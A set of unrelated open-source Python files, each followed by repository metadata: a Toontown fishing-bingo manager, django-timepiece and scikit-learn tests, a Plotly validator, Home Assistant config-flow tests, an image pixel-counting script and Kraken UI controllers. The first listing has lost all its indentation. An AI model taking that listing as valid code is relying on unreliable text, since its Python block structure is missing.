self.card = None
self.hasEntered = 0
self.initGameState = None
self.lastCatch = None
self.typeId = BingoGlobals.NORMAL_CARD
return
def generate(self):
DistributedObject.DistributedObject.generate(self)
self.card = BingoCardGui.BingoCardGui()
self.card.reparentTo(aspect2d, 1)
self.card.hideNextGameTimer()
self.notify.debug('generate: DistributedPondBingoManager')
def delete(self):
del self.pond.pondBingoMgr
self.pond.pondBingoMgr = None
del self.pond
self.pond = None
FSM.FSM.cleanup(self)
self.card.destroy()
del self.card
self.notify.debug('delete: Deleting Local PondManager %s' % self.doId)
DistributedObject.DistributedObject.delete(self)
return
def d_cardUpdate(self, cellId, genus, species):
self.sendUpdate('cardUpdate', [self.cardId,
cellId,
genus,
species])
def d_bingoCall(self):
self.sendUpdate('handleBingoCall', [self.cardId])
def setCardState(self, cardId, typeId, tileSeed, gameState):
self.cardId = cardId
self.typeId = typeId
self.tileSeed = tileSeed
self.jackpot = BingoGlobals.getJackpot(typeId)
self.initGameState = gameState
def checkForUpdate(self, cellId):
if self.lastCatch is not None:
genus = self.lastCatch[0]
species = self.lastCatch[1]
self.d_cardUpdate(cellId, genus, species)
success = self.card.cellUpdateCheck(cellId, genus, species)
if success == BingoGlobals.WIN:
self.lastCatch = None
self.enableBingo()
self.pond.getLocalToonSpot().cleanupFishPanel()
self.pond.getLocalToonSpot().hideBootPanel()
elif success == BingoGlobals.UPDATE:
self.lastCatch = None
self.pond.getLocalToonSpot().cleanupFishPanel()
self.pond.getLocalToonSpot().hideBootPanel()
else:
self.notify.warning('CheckForWin: Attempt to Play Cell without a valid catch.')
return
def updateGameState(self, gameState, cellId):
game = self.card.getGame()
if game is not None:
game.setGameState(gameState)
self.card.cellUpdate(cellId)
return
def __generateCard(self):
self.notify.debug('__generateCard: %s' % self.typeId)
if self.card.getGame():
self.card.removeGame()
game = self.__cardChoice()
game.setGameState(self.initGameState)
self.card.addGame(game)
self.card.generateCard(self.tileSeed, self.pond.getArea())
color = BingoGlobals.getColor(self.typeId)
self.card.setProp('image_color', VBase4(color[0], color[1], color[2], color[3]))
color = BingoGlobals.getButtonColor(self.typeId)
self.card.bingo.setProp('image_color', VBase4(color[0], color[1], color[2], color[3]))
if self.hasEntered:
self.card.loadCard()
self.card.show()
else:
self.card.hide()
def showCard(self):
if (self.state != 'Off' or self.state != 'CloseEvent') and self.card.getGame():
self.card.loadCard()
self.card.show()
elif self.state == 'GameOver':
self.card.show()
elif self.state == 'Reward':
self.card.show()
elif self.state == 'WaitCountdown':
self.card.show()
self.card.showNextGameTimer(TTLocalizer.FishBingoNextGame)
elif self.state == 'Intermission':
self.card.showNextGameTimer(TTLocalizer.FishBingoIntermission)
self.card.show()
self.hasEntered = 1
def __cardChoice(self):
return self.cardTypeDict.get(self.typeId)()
def checkForBingo(self):
success = self.card.checkForBingo()
if success:
self.d_bingoCall()
self.request('Reward')
def enableBingo(self):
self.card.setBingo(DGG.NORMAL, self.checkForBingo)
def setPondDoId(self, pondId):
self.pondDoId = pondId
if pondId in self.cr.doId2do:
self.setPond(self.cr.doId2do[pondId])
else:
self.acceptOnce('generate-%d' % pondId, self.setPond)
def setPond(self, pond):
self.pond = pond
self.pond.setPondBingoManager(self)
def setState(self, state, timeStamp):
self.notify.debug('State change: %s -> %s' % (self.state, state))
self.request(state, timeStamp)
def setLastCatch(self, catch):
self.lastCatch = catch
self.card.fishCaught(catch)
def castingStarted(self):
if self.card:
self.card.castingStarted()
def setSpot(self, spot):
self.spot = spot
def setJackpot(self, jackpot):
self.jackpot = jackpot
#todo: fix crash
def enterOff(self, args = None):
self.notify.debug('enterOff: Enter Off State')
del self.spot
self.spot = None
if self.card.getGame:
self.card.removeGame()
self.card.hide()
self.card.stopNextGameTimer()
self.hasEntered = 0
self.lastCatch = None
return
def filterOff(self, request, args):
if request == 'Intro':
return 'Intro'
elif request == 'WaitCountdown':
return (request, args)
elif request == 'Playing':
self.__generateCard()
self.card.setJackpotText(str(self.jackpot))
return (request, args)
elif request == 'Intermission':
return (request, args)
elif request == 'GameOver':
return (request, args)
elif request == 'Reward':
return ('GameOver', args)
else:
self.notify.debug('filterOff: Invalid State Transition from, Off to %s' % request)
def exitOff(self):
self.notify.debug('exitOff: Exit Off State')
def enterIntro(self, args = None):
self.notify.debug('enterIntro: Enter Intro State')
self.pond.setSpotGui()
self.hasEntered = 1
def filterIntro(self, request, args):
if request == 'WaitCountdown':
return (request, args)
else:
self.notify.debug('filterIntro: Invalid State Transition from Intro to %s' % request)
def exitIntro(self):
self.notify.debug('exitIntro: Exit Intro State')
def enterWaitCountdown(self, timeStamp):
self.notify.debug('enterWaitCountdown: Enter WaitCountdown State')
time = BingoGlobals.TIMEOUT_SESSION - globalClockDelta.localElapsedTime(timeStamp[0])
self.card.startNextGameCountdown(time)
if self.hasEntered:
self.card.showNextGameTimer(TTLocalizer.FishBingoNextGame)
def filterWaitCountdown(self, request, args):
if request == 'Playing':
return (request, args)
else:
self.notify.debug('filterOff: Invalid State Transition from WaitCountdown to %s' % request)
def exitWaitCountdown(self):
self.notify.debug('exitWaitCountdown: Exit WaitCountdown State')
if self.pond:
self.__generateCard()
self.card.setJackpotText(str(self.jackpot))
self.card.resetGameTimer()
self.card.hideNextGameTimer()
def enterPlaying(self, timeStamp):
self.notify.debug('enterPlaying: Enter Playing State')
self.lastCatch = None
session = BingoGlobals.getGameTime(self.typeId)
time = session - globalClockDelta.localElapsedTime(timeStamp[0])
self.card.startGameCountdown(time)
self.card.enableCard(self.checkForUpdate)
return
def filterPlaying(self, request, args):
if request == 'Reward':
return (request, args)
elif request == 'GameOver':
return (request, args)
else:
self.notify.debug('filterOff: Invalid State Transition from Playing to %s' % request)
def exitPlaying(self):
self.notify.debug('exitPlaying: Exit Playing State')
self.card.resetGameTimer()
def enterReward(self, timeStamp):
self.notify.debug('enterReward: Enter Reward State')
if self.card:
self.card.setBingo()
self.card.removeGame()
self.card.setGameOver(TTLocalizer.FishBingoVictory)
localToonSpot = self.pond.getLocalToonSpot()
if localToonSpot:
localToonSpot.setJarAmount(self.jackpot)
self.jackpot = 0
def filterReward(self, request, args):
if request == 'WaitCountdown':
return (request, args)
elif request == 'Intermission':
return (request, args)
elif request == 'CloseEvent':
return 'CloseEvent'
elif request == 'Off':
return 'Off'
else:
self.notify.debug('filterOff: Invalid State Transition from Reward to %s' % request)
def exitReward(self):
self.notify.debug('exitReward: Exit Reward State')
self.card.setGameOver('')
def enterGameOver(self, timeStamp):
self.notify.debug('enterGameOver: Enter GameOver State')
self.card.setBingo()
self.card.removeGame()
self.card.setGameOver(TTLocalizer.FishBingoGameOver)
def filterGameOver(self, request, args):
if request == 'WaitCountdown':
return (request, args)
elif request == 'Intermission':
return (request, args)
elif request == 'CloseEvent':
return 'CloseEvent'
elif request == 'Off':
return 'Off'
else:
self.notify.debug('filterOff: Invalid State Transition from GameOver to %s' % request)
def exitGameOver(self):
self.notify.debug('exitGameOver: Exit GameOver State')
self.card.setGameOver('')
self.card.resetGameTypeText()
def enterIntermission(self, timeStamp):
self.notify.debug('enterIntermission: Enter Intermission State')
if self.hasEntered:
self.card.showNextGameTimer(TTLocalizer.FishBingoIntermission)
self.notify.debug('enterIntermission: timestamp %s' % timeStamp[0])
elapsedTime = globalClockDelta.localElapsedTime(timeStamp[0])
self.notify.debug('enterIntermission: elapsedTime %s' % elapsedTime)
waitTime = BingoGlobals.HOUR_BREAK_SESSION - elapsedTime
self.notify.debug('enterIntermission: waitTime %s' % waitTime)
self.card.startNextGameCountdown(waitTime)
def filterIntermission(self, request, args):
if request == 'WaitCountdown':
return (request, args)
elif request == 'Off':
return 'Off'
else:
self.notify.warning('filterOff: Invalid State Transition from GameOver to %s' % request)
def exitIntermission(self):
self.notify.debug('enterIntermission: Exit Intermission State')
def enterCloseEvent(self, timestamp):
self.notify.debug('enterCloseEvent: Enter CloseEvent State')
self.card.hide()
self.pond.resetSpotGui()
def filterCloseEvent(self, request, args):
if request == 'Off':
return 'Off'
else:
self.notify.warning('filterOff: Invalid State Transition from GameOver to %s' % request)
def exitCloseEvent(self):
self.notify.debug('exitCloseEvent: Exit CloseEvent State')
| {
"content_hash": "d813823abd65390688ef46243b699c6b",
"timestamp": "",
"source": "github",
"line_count": 355,
"max_line_length": 103,
"avg_line_length": 36.78591549295775,
"alnum_prop": 0.6378742629604105,
"repo_name": "silly-wacky-3-town-toon/SOURCE-COD",
"id": "73139ee726ca8ceef8fbe48abe0049a9e9ed20d3",
"size": "13059",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "toontown/fishing/DistributedPondBingoManager.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "10249"
},
{
"name": "C",
"bytes": "1752256"
},
{
"name": "C#",
"bytes": "8440"
},
{
"name": "C++",
"bytes": "5485400"
},
{
"name": "Emacs Lisp",
"bytes": "210083"
},
{
"name": "F#",
"bytes": "2310"
},
{
"name": "Forth",
"bytes": "506"
},
{
"name": "GLSL",
"bytes": "1040"
},
{
"name": "JavaScript",
"bytes": "7003"
},
{
"name": "Makefile",
"bytes": "895"
},
{
"name": "Mask",
"bytes": "969"
},
{
"name": "NSIS",
"bytes": "1009050"
},
{
"name": "Objective-C",
"bytes": "21821"
},
{
"name": "PLSQL",
"bytes": "10200"
},
{
"name": "Pascal",
"bytes": "4986"
},
{
"name": "Perl6",
"bytes": "30612"
},
{
"name": "Puppet",
"bytes": "259"
},
{
"name": "Python",
"bytes": "33566014"
},
{
"name": "Shell",
"bytes": "14642"
},
{
"name": "Tcl",
"bytes": "2084458"
}
],
"symlink_target": ""
} |
import datetime
from django.conf import settings
from django.test import TestCase
from timepiece import utils
from timepiece.tests import factories
from timepiece.reports.utils import generate_dates
class ReportsTestBase(TestCase):
def setUp(self):
super(ReportsTestBase, self).setUp()
self.user = factories.User()
self.user2 = factories.User()
self.superuser = factories.Superuser()
self.devl_activity = factories.Activity(billable=True)
self.activity = factories.Activity()
self.sick = factories.Project()
self.vacation = factories.Project()
settings.TIMEPIECE_PAID_LEAVE_PROJECTS = {
'sick': self.sick.pk,
'vacation': self.vacation.pk,
}
self.leave = [self.sick.pk, self.vacation.pk]
self.p1 = factories.BillableProject(name='1')
self.p2 = factories.NonbillableProject(name='2')
self.p4 = factories.BillableProject(name='4')
self.p3 = factories.NonbillableProject(name='1')
self.p5 = factories.BillableProject(name='3')
self.default_projects = [self.p1, self.p2, self.p3, self.p4, self.p5]
self.default_dates = [
utils.add_timezone(datetime.datetime(2011, 1, 3)),
utils.add_timezone(datetime.datetime(2011, 1, 4)),
utils.add_timezone(datetime.datetime(2011, 1, 10)),
utils.add_timezone(datetime.datetime(2011, 1, 16)),
utils.add_timezone(datetime.datetime(2011, 1, 17)),
utils.add_timezone(datetime.datetime(2011, 1, 18)),
]
def make_entries(self, user=None, projects=None, dates=None,
hours=1, minutes=0):
"""Make several entries to help with reports tests"""
if not user:
user = self.user
if not projects:
projects = self.default_projects
if not dates:
dates = self.default_dates
for project in projects:
for day in dates:
self.log_time(project=project, start=day,
delta=(hours, minutes), user=user)
def bulk_entries(self, start=datetime.datetime(2011, 1, 2),
end=datetime.datetime(2011, 1, 4)):
start = utils.add_timezone(start)
end = utils.add_timezone(end)
dates = generate_dates(start, end, 'day')
projects = [self.p1, self.p2, self.p2, self.p4, self.p5, self.sick]
self.make_entries(projects=projects, dates=dates,
user=self.user, hours=2)
self.make_entries(projects=projects, dates=dates,
user=self.user2, hours=1)
def check_generate_dates(self, start, end, trunc, dates):
for index, day in enumerate(generate_dates(start, end, trunc)):
if isinstance(day, datetime.datetime):
day = day.date()
self.assertEqual(day, dates[index].date())
| {
"content_hash": "c4bd778ec85606ea989a903a9f5e619f",
"timestamp": "",
"source": "github",
"line_count": 72,
"max_line_length": 77,
"avg_line_length": 40.888888888888886,
"alnum_prop": 0.6049592391304348,
"repo_name": "caktus/django-timepiece",
"id": "ce18eb5f33bc16c10617993930c258d0ca458c0d",
"size": "2944",
"binary": false,
"copies": "3",
"ref": "refs/heads/develop",
"path": "timepiece/reports/tests/base.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "23745"
},
{
"name": "HTML",
"bytes": "235951"
},
{
"name": "JavaScript",
"bytes": "202697"
},
{
"name": "Python",
"bytes": "562382"
}
],
"symlink_target": ""
} |
import _plotly_utils.basevalidators
class YshiftValidator(_plotly_utils.basevalidators.NumberValidator):
def __init__(self, plotly_name="yshift", parent_name="layout.annotation", **kwargs):
super(YshiftValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "calc+arraydraw"),
**kwargs,
)
| {
"content_hash": "c3cf69cfaf4e6c7098b334344767cd4d",
"timestamp": "",
"source": "github",
"line_count": 11,
"max_line_length": 88,
"avg_line_length": 37.63636363636363,
"alnum_prop": 0.6328502415458938,
"repo_name": "plotly/plotly.py",
"id": "5633cad75994be08e97a0dc517dacc04e9e25cc4",
"size": "414",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "packages/python/plotly/plotly/validators/layout/annotation/_yshift.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "545"
},
{
"name": "JavaScript",
"bytes": "2074"
},
{
"name": "PostScript",
"bytes": "565328"
},
{
"name": "Python",
"bytes": "31506317"
},
{
"name": "TypeScript",
"bytes": "71337"
}
],
"symlink_target": ""
} |
"""Test the Smart Meter Texas config flow."""
import asyncio
from unittest.mock import patch
from aiohttp import ClientError
import pytest
from smart_meter_texas.exceptions import (
SmartMeterTexasAPIError,
SmartMeterTexasAuthError,
)
from homeassistant import config_entries, setup
from homeassistant.components.smart_meter_texas.const import DOMAIN
from homeassistant.const import CONF_PASSWORD, CONF_USERNAME
from tests.common import MockConfigEntry
TEST_LOGIN = {CONF_USERNAME: "test-username", CONF_PASSWORD: "test-password"}
async def test_form(hass):
"""Test we get the form."""
await setup.async_setup_component(hass, "persistent_notification", {})
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
assert result["type"] == "form"
assert result["errors"] == {}
with patch("smart_meter_texas.Client.authenticate", return_value=True), patch(
"homeassistant.components.smart_meter_texas.async_setup_entry",
return_value=True,
) as mock_setup_entry:
result2 = await hass.config_entries.flow.async_configure(
result["flow_id"], TEST_LOGIN
)
await hass.async_block_till_done()
assert result2["type"] == "create_entry"
assert result2["title"] == TEST_LOGIN[CONF_USERNAME]
assert result2["data"] == TEST_LOGIN
assert len(mock_setup_entry.mock_calls) == 1
async def test_form_invalid_auth(hass):
"""Test we handle invalid auth."""
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
with patch(
"smart_meter_texas.Client.authenticate",
side_effect=SmartMeterTexasAuthError,
):
result2 = await hass.config_entries.flow.async_configure(
result["flow_id"],
TEST_LOGIN,
)
assert result2["type"] == "form"
assert result2["errors"] == {"base": "invalid_auth"}
@pytest.mark.parametrize(
"side_effect", [asyncio.TimeoutError, ClientError, SmartMeterTexasAPIError]
)
async def test_form_cannot_connect(hass, side_effect):
"""Test we handle cannot connect error."""
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
with patch(
"smart_meter_texas.Client.authenticate",
side_effect=side_effect,
):
result2 = await hass.config_entries.flow.async_configure(
result["flow_id"], TEST_LOGIN
)
assert result2["type"] == "form"
assert result2["errors"] == {"base": "cannot_connect"}
async def test_form_unknown_exception(hass):
"""Test base exception is handled."""
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
with patch(
"smart_meter_texas.Client.authenticate",
side_effect=Exception,
):
result2 = await hass.config_entries.flow.async_configure(
result["flow_id"],
TEST_LOGIN,
)
assert result2["type"] == "form"
assert result2["errors"] == {"base": "unknown"}
async def test_form_duplicate_account(hass):
"""Test that a duplicate account cannot be configured."""
MockConfigEntry(
domain=DOMAIN,
unique_id="user123",
data={"username": "user123", "password": "password123"},
).add_to_hass(hass)
with patch(
"smart_meter_texas.Client.authenticate",
return_value=True,
):
result = await hass.config_entries.flow.async_init(
DOMAIN,
context={"source": config_entries.SOURCE_USER},
data={"username": "user123", "password": "password123"},
)
assert result["type"] == "abort"
assert result["reason"] == "already_configured"
| {
"content_hash": "29b68328fb6b5227522342e36a84c66a",
"timestamp": "",
"source": "github",
"line_count": 123,
"max_line_length": 82,
"avg_line_length": 31.43089430894309,
"alnum_prop": 0.6497672012415934,
"repo_name": "kennedyshead/home-assistant",
"id": "246ae4edc7d1f34985e9746baca16da5ce81fc38",
"size": "3866",
"binary": false,
"copies": "4",
"ref": "refs/heads/dev",
"path": "tests/components/smart_meter_texas/test_config_flow.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "1795"
},
{
"name": "Python",
"bytes": "33970989"
},
{
"name": "Shell",
"bytes": "4900"
}
],
"symlink_target": ""
} |
import argparse
import sys
# 3rd Party Imports
from PIL import Image
from prettytable import PrettyTable
class PixelCount:
# Dictionary to convert channel letters to their equivalent number.
channel_indexes = {
'r': 0,
'g': 1,
'b': 2
}
def __init__(self, image_file, channel, threshold):
# Arguments
self.image_file = image_file
self.channel_letter = channel
self.channel_num = self.channel_indexes[channel]
self.threshold = threshold
# Read image file into self.image
self.image = Image.open(self.image_file)
def count(self):
""" Split image into channels, count the pixels that are above
a threshold in the selected channel (self.channel_num)
"""
# Split image into R,G,B channels
channels = self.image.split()
# Get pixels as a vector (single dimension array)
channel_data = channels[self.channel_num].getdata()
total_pixels = len(channel_data)
# Loop over channel data, count pixels above threshold
above_threshold_count = 0
for pixel in channel_data:
if pixel >= self.threshold:
above_threshold_count += 1
above_threshold_percentage = \
(float(above_threshold_count) / total_pixels) * 100
# Return dictionary of values
return {
"total_pixels": total_pixels,
"above_threshold_count": above_threshold_count,
"above_threshold_percentage": above_threshold_percentage
}
class PixelCountCLI:
""" This class provides a command line interface for pixelcount
"""
def main(self, input_args):
""" The main method - this will be executed with pixelcount is run
from the command line
"""
# Deal with command line arguments
parser = argparse.ArgumentParser()
parser.add_argument('--channel', '-c', choices=['r', 'g', 'b'],
required=True)
parser.add_argument('--threshold', '-t', type=int, required=True)
parser.add_argument('--file', '-f', type=argparse.FileType('rb'),
required=True)
args = parser.parse_args(input_args)
# Initialise PixeCount
pc = PixelCount(image_file=args.file,
channel=args.channel,
threshold=args.threshold)
# Count!
results = pc.count()
# Print results in a table
table = PrettyTable(["Item", "Value"])
table.add_row(["Total Pixels", results["total_pixels"]])
table.add_row(["Channel", pc.channel_letter])
table.add_row(["Threshold", pc.threshold])
table.add_row(["Pixels in channel %s Above Threshold" %
pc.channel_letter, results["above_threshold_count"]])
table.add_row(["Above Threshold Percentage",
"%.2f%%" % results["above_threshold_percentage"]])
print table
# Run PixeCountCLI if this module is run as a script
if __name__ == '__main__':
cli = PixelCountCLI()
cli.main(sys.argv[1:])
| {
"content_hash": "8888012ef24ce3ab1025db0e7ebcacfd",
"timestamp": "",
"source": "github",
"line_count": 99,
"max_line_length": 76,
"avg_line_length": 31.939393939393938,
"alnum_prop": 0.5866540164452878,
"repo_name": "hughsaunders/pixelcount",
"id": "fd367d9b7ccc147adfe5b32c280d828a6ed8a865",
"size": "3212",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pixelcount/pixelcount.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "2745"
}
],
"symlink_target": ""
} |
from kraken.ui.Qt import QtGui, QtWidgets, QtCore
from undo_redo_manager import UndoRedoManager, Command
class ValueChangeCommand(Command):
def __init__(self, valueController, newValue):
super(ValueChangeCommand, self).__init__()
self._valueController = valueController
self.oldValue = self._valueController.getValue()
self.newValue = newValue
def shortDesc(self):
return "Value Change:'" + self._valueController.getName() + "'"
def redo(self):
self._valueController._setValue_NoUndo(self.newValue)
def undo(self):
self._valueController._setValue_NoUndo(self.oldValue)
def mergeWith(self, prevCommand):
if isinstance(prevCommand, ValueChangeCommand):
if prevCommand._valueController == self._valueController:
self.newValue = prevCommand.newValue
self._valueController._setValue_NoUndo(self.newValue)
return True
return False
class ValueController(QtCore.QObject):
valueChanged = QtCore.Signal(object)
editableChanged = QtCore.Signal(bool)
optionChanged = QtCore.Signal(str)
def __init__(self, name, dataType, editable=True, **kwargs):
super(ValueController, self).__init__()
self.name = name
self.dataType = dataType
self.editable = editable
self.options = kwargs
def getName(self):
return str(self.name)
def getDataType(self):
return self.dataType
def setValue(self, value):
command = ValueChangeCommand(self, value)
UndoRedoManager.getInstance().addCommand(command, invokeRedoOnAdd=True)
def _setValue_NoUndo(self, value):
raise NotImplementedError()
def getValue(self):
raise NotImplementedError()
def getOption(self, key, defaultValue=None):
return self.options.get(key, defaultValue)
def hasOption(self, key):
return key in self.options
def setOption(self, key, value):
self.options[key] = value
self.optionChanged.emit(key)
def isEditable(self):
return self.editable
def setEditable(self, editable):
self.editable = editable
self.editableChanged.emit(editable)
def _extractSimpleTypes(self, value):
if str(type(value)) == "<type 'PyRTValObject'>" and (
self.dataType == 'Boolean' or \
self.dataType == 'UInt8' or \
self.dataType == 'Byte' or \
self.dataType == 'SInt8' or \
self.dataType == 'UInt16' or \
self.dataType == 'SInt16' or \
self.dataType == 'UInt32' or \
self.dataType == 'Count' or \
self.dataType == 'Index' or \
self.dataType == 'Size' or \
self.dataType == 'SInt32' or \
self.dataType == 'Integer' or \
self.dataType == 'UInt64' or \
self.dataType == 'DataSize' or \
self.dataType == 'SInt64' or \
self.dataType == 'Float32' or \
self.dataType == 'Scalar' or \
self.dataType == 'Float64' or \
self.dataType == 'String'):
return value
else:
return value
def emitValueChanged(self):
self.valueChanged.emit(self.getValue())
class MemberController(ValueController):
def __init__(self, name, dataType, owner, editable=True, **kwargs):
super(MemberController, self).__init__(name, dataType, editable, **kwargs)
self.owner = owner
def _setValue_NoUndo(self, value):
setattr(self.owner, self.name, value)
self.valueChanged.emit(self.getValue())
def getValue(self):
return self._extractSimpleTypes(getattr(self.owner, self.name))
class ElementController(ValueController):
def __init__(self, name, dataType, owner, editable=True, **kwargs):
super(ElementController, self).__init__(name, dataType, editable, **kwargs)
self.owner = owner
def _setValue_NoUndo(self, value):
self.owner[self.name] = value
self.valueChanged.emit(self.getValue())
def getValue(self):
return self._extractSimpleTypes(self.owner[self.name])
class GetterSetterController(ValueController):
def __init__(self, name, dataType, getter=None, setter=None, defaultValue=None, **kwargs):
super(GetterSetterController, self).__init__(name, dataType=dataType, editable=(getter is not None and setter is not None), **kwargs)
self.getter = getter
self.setter = setter
self.value = defaultValue
def _setValue_NoUndo(self, value):
if self.setter is None:
self.value = value
else:
self.setter( value )
self.valueChanged.emit( self.getValue() )
def getValue(self):
if self.getter is None:
return self._extractSimpleTypes(self.value)
else:
return self._extractSimpleTypes(self.getter())
def setGetter(self, getter ):
self.getter = getter
self.value = self.getter()
self.valueChanged.emit(self.getValue())
def setGetterSetter(self, getter, setter ):
self.getter = getter
self.setter = setter
self.value = getter()
self.setEditable( self.setter is not None )
self.valueChanged.emit( self.getValue() )
| {
"content_hash": "49c1523be0664f841266570f16024a9e",
"timestamp": "",
"source": "github",
"line_count": 191,
"max_line_length": 141,
"avg_line_length": 28.167539267015705,
"alnum_prop": 0.616728624535316,
"repo_name": "oculusstorystudio/kraken",
"id": "2f07d9eab62e6cb3e988a8cf936e5be80ad85ca6",
"size": "5445",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop_OSS",
"path": "Python/kraken/ui/HAppkit_Editors/core/value_controller.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "AMPL",
"bytes": "136"
},
{
"name": "Batchfile",
"bytes": "2584"
},
{
"name": "CSS",
"bytes": "21033"
},
{
"name": "MAXScript",
"bytes": "521"
},
{
"name": "Mathematica",
"bytes": "4442959"
},
{
"name": "Python",
"bytes": "2841362"
},
{
"name": "Shell",
"bytes": "2689"
}
],
"symlink_target": ""
} |
import pickle
from io import BytesIO
import numpy as np
import scipy.sparse
from sklearn.datasets import load_digits, load_iris
from sklearn.model_selection import train_test_split
from sklearn.model_selection import cross_val_score
from sklearn.externals.six.moves import zip
from sklearn.utils.testing import assert_almost_equal
from sklearn.utils.testing import assert_array_equal
from sklearn.utils.testing import assert_array_almost_equal
from sklearn.utils.testing import assert_equal
from sklearn.utils.testing import assert_raises
from sklearn.utils.testing import assert_raise_message
from sklearn.utils.testing import assert_greater
from sklearn.utils.testing import assert_warns
from sklearn.naive_bayes import GaussianNB, BernoulliNB, MultinomialNB
# Data is just 6 separable points in the plane
X = np.array([[-2, -1], [-1, -1], [-1, -2], [1, 1], [1, 2], [2, 1]])
y = np.array([1, 1, 1, 2, 2, 2])
# A bit more random tests
rng = np.random.RandomState(0)
X1 = rng.normal(size=(10, 3))
y1 = (rng.normal(size=(10)) > 0).astype(np.int)
# Data is 6 random integer points in a 100 dimensional space classified to
# three classes.
X2 = rng.randint(5, size=(6, 100))
y2 = np.array([1, 1, 2, 2, 3, 3])
def test_gnb():
# Gaussian Naive Bayes classification.
# This checks that GaussianNB implements fit and predict and returns
# correct values for a simple toy dataset.
clf = GaussianNB()
y_pred = clf.fit(X, y).predict(X)
assert_array_equal(y_pred, y)
y_pred_proba = clf.predict_proba(X)
y_pred_log_proba = clf.predict_log_proba(X)
assert_array_almost_equal(np.log(y_pred_proba), y_pred_log_proba, 8)
# Test whether label mismatch between target y and classes raises
# an Error
# FIXME Remove this test once the more general partial_fit tests are merged
assert_raises(ValueError, GaussianNB().partial_fit, X, y, classes=[0, 1])
def test_gnb_prior():
# Test whether class priors are properly set.
clf = GaussianNB().fit(X, y)
assert_array_almost_equal(np.array([3, 3]) / 6.0,
clf.class_prior_, 8)
clf.fit(X1, y1)
# Check that the class priors sum to 1
assert_array_almost_equal(clf.class_prior_.sum(), 1)
def test_gnb_sample_weight():
"""Test whether sample weights are properly used in GNB. """
# Sample weights all being 1 should not change results
sw = np.ones(6)
clf = GaussianNB().fit(X, y)
clf_sw = GaussianNB().fit(X, y, sw)
assert_array_almost_equal(clf.theta_, clf_sw.theta_)
assert_array_almost_equal(clf.sigma_, clf_sw.sigma_)
# Fitting twice with half sample-weights should result
# in same result as fitting once with full weights
sw = rng.rand(y.shape[0])
clf1 = GaussianNB().fit(X, y, sample_weight=sw)
clf2 = GaussianNB().partial_fit(X, y, classes=[1, 2], sample_weight=sw / 2)
clf2.partial_fit(X, y, sample_weight=sw / 2)
assert_array_almost_equal(clf1.theta_, clf2.theta_)
assert_array_almost_equal(clf1.sigma_, clf2.sigma_)
# Check that duplicate entries and correspondingly increased sample
# weights yield the same result
ind = rng.randint(0, X.shape[0], 20)
sample_weight = np.bincount(ind, minlength=X.shape[0])
clf_dupl = GaussianNB().fit(X[ind], y[ind])
clf_sw = GaussianNB().fit(X, y, sample_weight)
assert_array_almost_equal(clf_dupl.theta_, clf_sw.theta_)
assert_array_almost_equal(clf_dupl.sigma_, clf_sw.sigma_)
def test_gnb_neg_priors():
"""Test whether an error is raised in case of negative priors"""
clf = GaussianNB(priors=np.array([-1., 2.]))
assert_raises(ValueError, clf.fit, X, y)
def test_gnb_priors():
"""Test whether the class prior override is properly used"""
clf = GaussianNB(priors=np.array([0.3, 0.7])).fit(X, y)
assert_array_almost_equal(clf.predict_proba([[-0.1, -0.1]]),
np.array([[0.825303662161683,
0.174696337838317]]), 8)
assert_array_equal(clf.class_prior_, np.array([0.3, 0.7]))
def test_gnb_wrong_nb_priors():
""" Test whether an error is raised if the number of prior is different
from the number of class"""
clf = GaussianNB(priors=np.array([.25, .25, .25, .25]))
assert_raises(ValueError, clf.fit, X, y)
def test_gnb_prior_greater_one():
"""Test if an error is raised if the sum of prior greater than one"""
clf = GaussianNB(priors=np.array([2., 1.]))
assert_raises(ValueError, clf.fit, X, y)
def test_gnb_prior_large_bias():
"""Test if good prediction when class prior favor largely one class"""
clf = GaussianNB(priors=np.array([0.01, 0.99]))
clf.fit(X, y)
assert_equal(clf.predict([[-0.1, -0.1]]), np.array([2]))
def test_check_update_with_no_data():
""" Test when the partial fit is called without any data"""
# Create an empty array
prev_points = 100
mean = 0.
var = 1.
x_empty = np.empty((0, X.shape[1]))
tmean, tvar = GaussianNB._update_mean_variance(prev_points, mean,
var, x_empty)
assert_equal(tmean, mean)
assert_equal(tvar, var)
def test_gnb_pfit_wrong_nb_features():
"""Test whether an error is raised when the number of feature changes
between two partial fit"""
clf = GaussianNB()
# Fit for the first time the GNB
clf.fit(X, y)
# Partial fit a second time with an incoherent X
assert_raises(ValueError, clf.partial_fit, np.hstack((X, X)), y)
def test_discrete_prior():
# Test whether class priors are properly set.
for cls in [BernoulliNB, MultinomialNB]:
clf = cls().fit(X2, y2)
assert_array_almost_equal(np.log(np.array([2, 2, 2]) / 6.0),
clf.class_log_prior_, 8)
def test_mnnb():
# Test Multinomial Naive Bayes classification.
# This checks that MultinomialNB implements fit and predict and returns
# correct values for a simple toy dataset.
for X in [X2, scipy.sparse.csr_matrix(X2)]:
# Check the ability to predict the learning set.
clf = MultinomialNB()
assert_raises(ValueError, clf.fit, -X, y2)
y_pred = clf.fit(X, y2).predict(X)
assert_array_equal(y_pred, y2)
# Verify that np.log(clf.predict_proba(X)) gives the same results as
# clf.predict_log_proba(X)
y_pred_proba = clf.predict_proba(X)
y_pred_log_proba = clf.predict_log_proba(X)
assert_array_almost_equal(np.log(y_pred_proba), y_pred_log_proba, 8)
# Check that incremental fitting yields the same results
clf2 = MultinomialNB()
clf2.partial_fit(X[:2], y2[:2], classes=np.unique(y2))
clf2.partial_fit(X[2:5], y2[2:5])
clf2.partial_fit(X[5:], y2[5:])
